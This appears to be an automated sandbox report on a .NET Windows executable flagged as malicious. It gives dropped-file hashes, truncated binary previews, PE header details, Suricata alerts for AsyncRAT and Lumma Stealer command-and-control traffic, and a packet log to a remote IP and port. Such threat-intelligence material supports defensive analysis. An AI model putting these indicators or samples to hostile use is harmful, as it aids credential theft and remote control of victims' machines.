C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2uxob3w4.hf5.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jrntmms3.3fe.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\57lklPjdPc.exe

Download File

Process:	C:\Users\user\Desktop\57lklPjdPc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	352768
Entropy (8bit):	7.854006767539572
Encrypted:	false
SSDEEP:	6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
MD5:	C164ED9887BD51CBA150379514DC4E81
SHA1:	178639B8961FA5236683498E06F78B8887155999
SHA-256:	B748235A791B5F8C5B80202EF3345BC8325A7EA246B004D57DF5521E2F79B429
SHA-512:	778DED0EE041DC7710AAA8B76BB3C7ABF319744BEA48BBA91F2013CEA2B1704DFAADABBC675B4035AC3C0DB68AE046B3737E8E42815FB864B6A146B575CBD65A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 58% Antivirus: Virustotal, Detection: 62%, Browse
Joe Sandbox View:	Filename: PT54FFSL7ET46RASB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................. w..K.......p............................................................................ ............... ..H............text...tW... ...X.................. ..`.rsrc...p............Z..............@..@.reloc...............`..............@..B................Pw......H.......P...XR..............................................................(......(......0..l.......(...... ....o..... .Z.p ..!a~M...{{...a('...(....o..... XE. .@.ka~M...{>...a('...(....o......o.....o....o.....s..... .~.......%.....(....s........s.........o....s.......o....s....................o....&...(.........s..........o....s .........o....o!........c.....9......o"......9......o"......9......o"......9......o".....9.....o".....9.....o".....9.....o"......A...........

C:\Users\user\AppData\Roaming\l6E.exe

Download File

Process:	C:\Users\user\Desktop\57lklPjdPc.exe
File Type:	PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	354168
Entropy (8bit):	7.9876324425692316
Encrypted:	false
SSDEEP:	6144:HDd+O7VyIqZiQUa+I0st4nlSVbiWN6VqWeqfn3Zsz9HMiobZYK1QE:B+O5yIqxwI3tFOqWeqcYbZYzE
MD5:	FAC2188E4A28A0CF32BF4417D797B0F8
SHA1:	1970DE8788C07B548BF04D0062A1D4008196A709
SHA-256:	D737637EE5F121D11A6F3295BF0D51B06218812B5EC04FE9EA484921E905A207
SHA-512:	58086100D653CEEAE44E0C99EC8348DD2BEAF198240F37691766BEE813953F8514C485E39F5552EE0D18C61F02BFF10C0C427F3FEC931BC891807BE188164B2B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 29%
Joe Sandbox View:	Filename: PT54FFSL7ET46RASB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f.................4...........R... ...`....@.. ....................................`..................................R..S....`...............>..x)..........PQ............................................... ............... ..H............text....2... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............<..............@..B.................R......H.......XA.................................................................) .j.\E...\...p..M.:..[.1..,j,@}g......b..CZ.)...^....Z..............M\|...!.D&.&K.RbW..L..._r..c...u....0..7(..m0]...(..x\...*..;.}:.[.J.$=....&h,\..`M.!x.....`.)C...h.p(...}.{.n.+J\C....=..?#.A...#....j&G.`5b....\|.FT..>Z...A....w.&..J...5...uf..J.U.2F....Gd.F......+".P..N'.D...$.G:2.Rm`5......Zz ...H..Q.._...F.j.h`.UE.W.Sc(./..D..@xn.....<#hk=b.f.\.......1...x....+.b.m+f..b..'...n

\Device\Null

Download File

Process:	C:\Windows\SysWOW64\PING.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	365
Entropy (8bit):	4.7383749854021335
Encrypted:	false
SSDEEP:	6:PzN7vmWxHLTSJALTSJALTSJALTSJALTSrcsWTo65FWjwAFeMmvVOIHJFxMVlmJHu:PJ75pTcgTcgTcgTcgTLs4oSsEAFSkIr+
MD5:	39FB87C9B179B4B6B5CC65802005092E
SHA1:	FE3B211211D9863F214D3584288D3ABEE3568B94
SHA-256:	3B855391F8BB3D5ED1807F7A1319720306F0F21144F07E99F4DCEDF95AB6F28C
SHA-512:	616AB8DB01EB5C807EC80DEF6EC08D67A129DE070E0B66D3487C9140E5ABCEAA5851E0573FBF3D88800925322D7ACB6694B02ABF3B1E18C973A1220EA9BF869C
Malicious:	false
Preview:	..Pinging 134349 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 5, Received = 5, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.854006767539572
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	57lklPjdPc.exe
File size:	352'768 bytes
MD5:	c164ed9887bd51cba150379514dc4e81
SHA1:	178639b8961fa5236683498e06f78b8887155999
SHA256:	b748235a791b5f8c5b80202ef3345bc8325a7ea246b004d57df5521e2f79b429
SHA512:	778ded0ee041dc7710aaa8b76bb3c7abf319744bea48bba91f2013cea2b1704dfaadabbc675b4035ac3c0db68ae046b3737e8e42815fb864b6a146b575cbd65a
SSDEEP:	6144:dN1noCMJh6qP/LEkjKVP4vWtL9KeaIQ3Wjn2XJBck0XU9EljKwt0bRg:IS6/Ykj0P4vWtL9Kk6KOBfUx+Qyg
TLSH:	AD7412417A8E5719C56856B9C0D3242403F2A7CB7673DBAB3E0D03A84F02399DF56FA5
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....D...............0..X..........nw... ........@.. ....................................@................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x45776e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9944C62E [Mon Jun 26 19:40:30 2051 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x57720	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x58000	0x570	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x55774	0x55800	c5f9b0488bda4f24e0c6647e53096523	False	0.9210811860380117	data	7.870067595402444	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x58000	0x570	0x600	5e140f816c57303cc06cf5cef939c94a	False	0.4029947916666667	data	3.9524248753127935	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5a000	0xc	0x200	fe1f3ca06406d93cb76967f9a880369a	False	0.044921875	data	0.09800417566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x580a0	0x2e4	data			0.4283783783783784
RT_MANIFEST	0x58384	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-19T02:37:52.547549+0200	2035595	ET MALWARE Generic AsyncRAT Style SSL Cert	1	45.11.229.96	56001	192.168.11.20	49782	TCP
2024-09-19T02:39:02.730227+0200	2055879	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eemmbryequo .shop)	1	192.168.11.20	57305	1.1.1.1	53	UDP
2024-09-19T02:39:03.062485+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.11.20	49784	172.67.142.26	443	TCP
2024-09-19T02:39:03.280632+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.11.20	49784	172.67.142.26	443	TCP
2024-09-19T02:39:03.280632+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49784	172.67.142.26	443	TCP
2024-09-19T02:39:03.569353+0200	2055880	ET MALWARE Observed Win32/Lumma Stealer Related Domain (eemmbryequo .shop in TLS SNI)	1	192.168.11.20	49785	172.67.142.26	443	TCP
2024-09-19T02:39:04.111101+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.11.20	49785	172.67.142.26	443	TCP
2024-09-19T02:39:04.111101+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.11.20	49785	172.67.142.26	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2024 02:37:51.660680056 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:51.841447115 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:51.841685057 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:51.843959093 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:52.128376961 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:52.128637075 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:52.365309000 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:52.365345955 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:52.365658045 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:52.369949102 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:52.547549009 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:52.597278118 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:54.054373980 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:54.312230110 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:37:54.312380075 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:37:54.530112982 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:23.591352940 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:23.826965094 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:23.827331066 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:24.017775059 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:24.059314966 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:24.235563040 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:24.240524054 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:24.514568090 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:24.514998913 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:24.826689959 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:46.770575047 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:46.819852114 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:46.997386932 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.001326084 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.313342094 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.313613892 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.541527033 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541634083 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541712999 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541789055 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541865110 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541923046 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541980982 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.541985989 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.541986942 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.542061090 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.542120934 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.542184114 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.542196035 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.542237043 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.542259932 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.542325020 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.542417049 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.542615891 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.726003885 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726144075 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726247072 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726346970 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726377010 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.726432085 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726505041 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.726537943 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726620913 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726722002 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726763010 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.726811886 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726893902 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.726982117 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727005959 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727062941 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727116108 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727152109 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727235079 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727320910 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727329969 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727401972 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727488995 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727524996 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727571011 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727617025 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727677107 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727751970 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727791071 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.727829933 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.727905035 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.728029966 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.728091002 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.914017916 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914139032 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914235115 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914330006 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914401054 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914484024 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914489031 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.914489985 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.914556980 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914657116 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914702892 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.914731979 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914824963 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.914885044 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.914926052 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915019035 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915054083 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915086031 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915170908 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915215015 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915239096 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915322065 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915396929 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915472031 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915493965 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915494919 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915544033 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915608883 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915669918 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915719032 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915802002 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915810108 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.915884972 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.915951967 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916033030 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916058064 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.916100979 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916121006 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.916213989 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916348934 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.916410923 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916491985 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916570902 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916608095 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.916635036 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916714907 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916780949 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916801929 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.916862965 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.916930914 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917006969 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917018890 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.917081118 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917149067 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917232037 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917263031 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.917298079 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917361975 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.917378902 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917447090 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:47.917531967 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.917592049 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:47.917706013 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.099396944 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.099571943 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.099654913 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.099737883 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.099737883 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.099802971 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100094080 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100203991 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100280046 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100354910 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100361109 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100354910 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100424051 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100481987 CEST	56001	49782	45.11.229.96	192.168.11.20
Sep 19, 2024 02:38:48.100514889 CEST	49782	56001	192.168.11.20	45.11.229.96
Sep 19, 2024 02:38:48.100552082 CEST	56001	49782	45.11.229.96	192.168.11.20
